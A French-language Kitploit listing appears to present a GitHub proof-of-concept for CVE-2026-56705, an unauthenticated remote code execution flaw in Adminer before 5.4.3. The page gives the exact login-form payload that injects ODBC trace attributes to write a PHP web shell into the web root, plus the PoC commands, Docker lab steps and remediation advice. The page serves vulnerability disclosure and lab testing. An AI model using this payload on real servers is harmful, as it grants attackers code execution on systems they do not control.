Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-56705 — Exploit PoC pour Adminer < 5.4.3 RCE non authentifié via injection de DSN PDO MSSQL, incluant un laboratoire Docker et un test négatif. | Kitploit
Outils/GitHubGitHub/boreas37/cve-2026-56705
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationRed TeamingLabs et Pratique
GitHubboreas37/cve-2026-56705

CVE-2026-56705

Exploit PoC pour Adminer < 5.4.3 RCE non authentifié via injection de DSN PDO MSSQL, incluant un laboratoire Docker et un test négatif.

Voir le dépôt
218il y a 21 joursPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-56705 : Adminer < 5.4.3 — RCE non authentifié via injection DSN PDO MSSQL

CVECVE-2026-56705
GHSAGHSA-r4x9-5m63-3vxw (avis du fournisseur) / GHSA-34q8-53jm-qc2r (base GitHub)
ProduitAdminer (outil PHP de gestion de base de données mono-fichier)
Versions concernéesAdminer < 5.4.3 avec pdo_sqlsrv + pilote Microsoft ODBC pour SQL Server
Corrigé dans5.4.3
CVSS9.8 Critique (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)
TypeCWE-20 → écriture de fichier arbitraire non authentifiée → RCE

Résumé

Adminer ne nettoie pas le champ server fourni par l'utilisateur avant de construire le DSN PDO pour les connexions MSSQL :

root@kitploit:~
// adminer/drivers/mssql.inc.php
function attach(string $server, string $username, string $password): string {
    list($host, $port) = host_port($server);
    return $this->dsn("sqlsrv:Server=$host" . ($port ? ",$port" : ""), $username, $password);
}

Les points-virgules dans server sont traités comme des délimiteurs d'attributs de connexion ODBC, de sorte qu'un attaquant non authentifié peut ajouter des attributs arbitraires au DSN — notamment TraceFile et TraceOn. La fonctionnalité de trace unixODBC écrit la chaîne de connexion complète (avec UID={username} tel quel) dans TraceFile avant et indépendamment du succès de la tentative de connexion. L'injection de code PHP via le champ username et le pointage de TraceFile vers la racine web produit un web shell.

Une seule requête POST de connexion non authentifiée suffit. Aucun identifiant valide, aucune interaction utilisateur.

Exploitation

root@kitploit:~
auth[driver]   = mssql
auth[server]   = 127.0.0.1;TraceFile=/var/www/shell.php;TraceOn=1
auth[username] = <?php echo 'POC::'.shell_exec($_GET['c']);?>
auth[password] = x
  1. La requête POST de connexion construit le DSN sqlsrv:Server=127.0.0.1;TraceFile=/var/www/shell.php;TraceOn=1
  2. Le gestionnaire de pilotes ODBC écrit une trace contenant UID={<?php ... ?>} dans /var/www/shell.php
  3. La connexion échoue (attendu, sans importance) — le fichier est déjà écrit
  4. GET /shell.php?c=id → la commande s'exécute

Utilisation

root@kitploit:~
# empreinte uniquement
python3 poc.py --target http://target/adminer.php --check

# exploitation complète (écrit <random>.php dans la racine web)
python3 poc.py --target http://target/adminer.php --command "id"

Reproduction en laboratoire

root@kitploit:~
cd lab/
docker build -t adminer-cve-2026-56705 .
docker run -d -p 8081:8081 adminer-cve-2026-56705
python3 ../poc.py --target http://localhost:8081/adminer.php --command id

L'image du laboratoire reproduit exactement les prérequis de l'avis : php:8.3-cli + pdo_sqlsrv (pecl) + msodbcsql18, racine web accessible en écriture par le processus PHP.

Remédiation

  • Mettez à niveau vers Adminer 5.4.3+.
  • Si vous ne pouvez pas mettre à niveau immédiatement : supprimez/bloquez le pilote mssql, ou supprimez ; (et les espaces) des valeurs server fournies par l'utilisateur au niveau d'un proxy inverse.
  • Restreignez la racine web contre les écritures de l'utilisateur PHP-FPM/CLI comme défense en profondeur.

Crédits

L'avis du fournisseur attribue la découverte conjointement au rapporteur et à Yashar Shahinzadeh (@voorivex).

PoC & laboratoire : Hamza Cagrici (@Boreas37)

Chronologie

DateÉvénement
2026-08-25CVE publiée / corrigée dans Adminer 5.4.3
Télécharger l’outil